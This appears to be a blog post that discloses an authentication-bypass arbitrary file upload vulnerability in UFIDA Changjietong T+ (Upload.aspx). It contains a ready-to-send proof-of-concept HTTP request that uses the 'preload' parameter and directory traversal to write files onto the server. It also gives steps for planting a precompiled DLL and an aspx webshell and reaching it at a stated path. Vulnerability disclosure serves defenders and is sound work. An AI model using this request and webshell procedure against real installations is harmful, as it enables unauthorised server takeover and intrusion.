Post

Ufida Changjietong T+ Upload Aspx Any File Upload Vulnerability

Ufida Changjietong T+ Upload Aspx Any File Upload Vulnerability

UFIDA Changjietong T+ Upload.aspx Any file upload vulnerability

Vulnerability Description

There is a vulnerability to upload any file in UFIDA Changjietong T+ Upload.aspx interface. The attacker bypasses authentication through the preload parameter to upload files to control the server.

Vulnerability Impact

UFIDA Changjietong T+

Network surveying and mapping

Vulnerability reappears

Login page

img

The vulnerable interface is ` /tplus/SM/SetupAccount/Upload.aspx, corresponding file App_Web_upload.aspx.9475d17f.dll`

img

The upload file type verification is incomplete. You can upload any file to any location in the server to verify the POC.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 261
User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu
Connection: close

------WebKitFormBoundaryVXR9biLu
Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt"
Content-Type: image/jpeg

1
------WebKitFormBoundaryVXR9biLu--

Since the application is precompiled, the directly uploaded aspx Trojan cannot be directly used. You need to use the Webshell after uploading the dll and compiled files.

img

Upload the dll and compiled files to the bin directory of the web application, and upload aspx to the web root directory

img

img

img

Then access the written Webshell to connect

1
/tplus/shell.aspx?preload=1	
This post is licensed under CC BY 4.0 by the author.